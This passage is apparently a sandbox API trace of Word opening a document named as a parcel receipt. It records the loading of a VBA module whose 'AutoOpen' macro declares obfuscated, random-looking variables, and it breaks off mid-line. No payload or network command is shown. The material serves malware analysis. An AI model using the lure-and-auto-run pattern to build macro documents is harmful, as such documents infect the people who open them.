lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¤", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¥", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¦", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="§", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¨", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="©", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ª", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="«", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¬", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="­", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="®", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¯", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="°", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="±", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="²", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="³", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="´", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="µ", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¶", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="·", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¸", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¹", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="º", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="»", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¼", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="½", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¾", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¿", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="À", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Á", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Â", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ã", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ä", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Å", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Æ", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ç", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="È", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="É", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ê", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ë", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ì", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Í", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Î", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ï", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ð", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ñ", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ò", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ó", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ô", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Õ", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ö", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="×", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ø", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ù", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ú", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Û", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ü", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ý", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Þ", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ß", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="à", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="á", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="â", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ã", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ä", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="å", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="æ", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ç", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="è", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="é", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ê", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ë", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ì", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="í", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="î", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ï", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.001] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ð", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.002] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ñ", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.002] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ò", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.002] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ó", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.002] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ô", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.002] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="õ", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.002] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ö", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.002] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="÷", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.002] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ø", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.002] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ù", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.002] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ú", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.002] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="û", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.002] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ü", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.002] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ý", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.002] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="þ", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.002] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ÿ", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.002] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0017.002] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Name") returned 0x10e2ff [0017.002] IMalloc:Alloc (This=0x7fefe9e5380, cb=0xd) returned 0x79784c0 [0017.002] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x1a) returned 0x778c140 [0017.002] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x79784c0, cbMultiByte=13, lpWideCharStr=0x778c140, cchWideChar=13 | out: lpWideCharStr="ThisDocument") returned 13 [0017.002] IMalloc:Free (This=0x7fefe9e5380, pv=0x79784c0) [0017.002] IMalloc:Free (This=0x7fefe9e5380, pv=0x778c140) [0017.002] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0017.002] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Base") returned 0x109fb8 [0017.002] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x15) returned 0x79784c0 [0017.003] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x2a) returned 0x7818760 [0017.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x79784c0, cbMultiByte=21, lpWideCharStr=0x7818760, cchWideChar=21 | out: lpWideCharStr="1Normal.ThisDocument") returned 21 [0017.003] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x2a) returned 0x7818720 [0017.003] IMalloc:Free (This=0x7fefe9e5380, pv=0x79784c0) [0017.003] IMalloc:Free (This=0x7fefe9e5380, pv=0x7818760) [0017.003] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0017.003] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_GlobalNameSpace") returned 0x10ce77 [0017.003] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0017.003] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0017.003] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Creatable") returned 0x101d92 [0017.003] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0017.003] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0017.003] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_PredeclaredId") returned 0x105fc7 [0017.004] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0017.004] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0017.004] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Exposed") returned 0x1030b3 [0017.004] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0017.004] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0017.004] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_TemplateDerived") returned 0x109f1e [0017.004] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0017.004] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0017.004] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Customizable") returned 0x10c26d [0017.004] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0017.004] CExposedStream::Read () returned 0x0 [0017.004] CExposedStream::Release () returned 0x1 [0017.004] CExposedStream::Release () returned 0x0 [0017.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NewMacros", cchWideChar=10, lpMultiByteStr=0x286880, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NewMacros", lpUsedDefaultChar=0x0) returned 10 [0017.005] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NewMacros") returned 0x106aae [0017.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NewMacros", cchWideChar=10, lpMultiByteStr=0x2869c0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NewMacros", lpUsedDefaultChar=0x0) returned 10 [0017.005] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NewMacros") returned 0x106aae [0017.005] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x80) returned 0x7934d10 [0017.005] IMalloc:GetSize (This=0x7fefe9e5380, pv=0x7934d10) returned 0x80 [0017.005] IMalloc:Alloc (This=0x7fefe9e5380, cb=0xb8) returned 0x79f5190 [0017.005] IMalloc:Alloc (This=0x7fefe9e5380, cb=0xb8) returned 0x79f5250 [0017.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NewMacros", cchWideChar=10, lpMultiByteStr=0x286880, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NewMacros", lpUsedDefaultChar=0x0) returned 10 [0017.005] CoCreateGuid (in: pguid=0x2865b0 | out: pguid=0x2865b0*(Data1=0x60f61a18, Data2=0x6aac, Data3=0x4c83, Data4=([0]=0x90, [1]=0x55, [2]=0x75, [3]=0x6b, [4]=0x22, [5]=0xf6, [6]=0xd, [7]=0x30))) returned 0x0 [0017.005] CoCreateGuid (in: pguid=0x2865c0 | out: pguid=0x2865c0*(Data1=0x8cace5b4, Data2=0xbca1, Data3=0x470b, Data4=([0]=0x95, [1]=0x45, [2]=0x43, [3]=0x98, [4]=0xb2, [5]=0xac, [6]=0x79, [7]=0xad))) returned 0x0 [0017.005] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="NewMacros", cchWideChar=10, lpMultiByteStr=0x2865d0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NewMacros", lpUsedDefaultChar=0x0) returned 10 [0017.005] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NewMacros") returned 0x106aae [0017.005] GetLocalTime (in: lpSystemTime=0x2864a8 | out: lpSystemTime=0x2864a8*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x3, wDay=0xa, wHour=0xa, wMinute=0x31, wSecond=0x7, wMilliseconds=0x1c2)) [0017.005] _ultow_s (in: _Value=0x5c2b45a3, _Buffer=0xbccca54, _BufferCount=0x9, _Radix=16 | out: _Buffer="5c2b45a3") returned 0x0 [0017.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="025c2b45a3", cchWideChar=11, lpMultiByteStr=0x286440, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="025c2b45a3", lpUsedDefaultChar=0x0) returned 11 [0017.005] strcpy_s (in: _Dst=0x79e0350, _DstSize=0xa, _Src="NewMacros" | out: _Dst="NewMacros") returned 0x0 [0017.005] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NewMacros") returned 0x106aae [0017.005] wcscpy_s (in: _Destination=0xbccca68, _SizeInWords=0xa, _Source="NewMacros" | out: _Destination="NewMacros") returned 0x0 [0017.005] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NewMacros") returned 0x106aae [0017.005] wcscpy_s (in: _Destination=0xbccca80, _SizeInWords=0xa, _Source="NewMacros" | out: _Destination="NewMacros") returned 0x0 [0017.005] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NewMacros") returned 0x106aae [0017.005] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x54) returned 0x78a21b0 [0017.005] IMalloc:Free (This=0x7fefe9e5380, pv=0x79b15b0) [0017.005] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x20) returned 0x778c080 [0017.005] IMalloc:Free (This=0x7fefe9e5380, pv=0x78a21b0) [0017.005] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x3d0) returned 0xbd4a750 [0017.005] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x20) returned 0x778c080 [0017.005] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x10) returned 0x7978540 [0017.005] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x80) returned 0x7934e30 [0017.005] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x0) returned 0x790db50 [0017.005] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x0) returned 0x790dc70 [0017.006] wcsncpy_s (in: _Destination=0x286590, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc") returned 0x0 [0017.006] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc", cchLength=0x39 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\receipt-parcel-uk980-456.doc") returned 0x39 [0017.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt-parcel-uk980-456.doc", cchWideChar=58, lpMultiByteStr=0x2864c0, cbMultiByte=116, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt-parcel-uk980-456.doc", lpUsedDefaultChar=0x0) returned 58 [0017.006] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc") returned 0 [0017.006] CExposedDocFile::AddRef () returned 0x4 [0017.006] CExposedDocFile::AddRef () returned 0x5 [0017.006] CExposedDocFile::OpenStream () returned 0x0 [0017.006] CExposedDocFile::Release () returned 0x4 [0017.006] CExposedStream::Seek () returned 0x0 [0017.006] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x688) returned 0xbd4ab30 [0017.006] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x80) returned 0x7934ec0 [0017.006] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x640) returned 0xbd4b1c0 [0017.006] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x20) returned 0x778c050 [0017.006] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x0) returned 0x790db60 [0017.006] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x0) returned 0xbd0f080 [0017.006] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x20) returned 0x778bff0 [0017.006] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x80) returned 0x7934f50 [0017.006] CExposedStream::AddRef () returned 0x2 [0017.006] CExposedStream::Read () returned 0x0 [0017.006] CExposedStream::AddRef () returned 0x3 [0017.006] CExposedStream::Release () returned 0x2 [0017.006] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x2ee0) returned 0xbd4b810 [0017.006] CExposedStream::Read () returned 0x0 [0017.006] CExposedStream::Read () returned 0x0 [0017.006] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_Evaluate") returned 0x10d918 [0017.006] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0017.006] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Name") returned 0x10e2ff [0017.006] IMalloc:Alloc (This=0x7fefe9e5380, cb=0xa) returned 0x79785c0 [0017.006] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x14) returned 0x79785e0 [0017.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x79785c0, cbMultiByte=10, lpWideCharStr=0x79785e0, cchWideChar=10 | out: lpWideCharStr="NewMacros") returned 10 [0017.006] IMalloc:Free (This=0x7fefe9e5380, pv=0x79785c0) [0017.006] IMalloc:Free (This=0x7fefe9e5380, pv=0x79785e0) [0017.006] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0017.006] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AutoOpen") returned 0x102ad9 [0017.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5032b66, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0017.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5032b66, cbMultiByte=8, lpWideCharStr=0x7831cb8, cchWideChar=8 | out: lpWideCharStr="AutoOpen") returned 8 [0017.006] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x5040000 [0017.007] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0017.007] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OGADJTPBNNVIKR") returned 0x10deec [0017.007] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0017.007] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0017.007] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0017.007] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FMBVJVBB") returned 0x10d872 [0017.007] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0017.007] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0017.007] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OGADJTPBNNVIKR") returned 0x10deec [0017.007] strcpy_s (in: _Dst=0x7fef106d150, _DstSize=0x100, _Src="OGADJTPBNNVIKR" | out: _Dst="OGADJTPBNNVIKR") returned 0x0 [0017.008] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OGADJTPBNNVIKR") returned 0x10deec [0017.008] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VRUOAIRHKHHTMF") returned 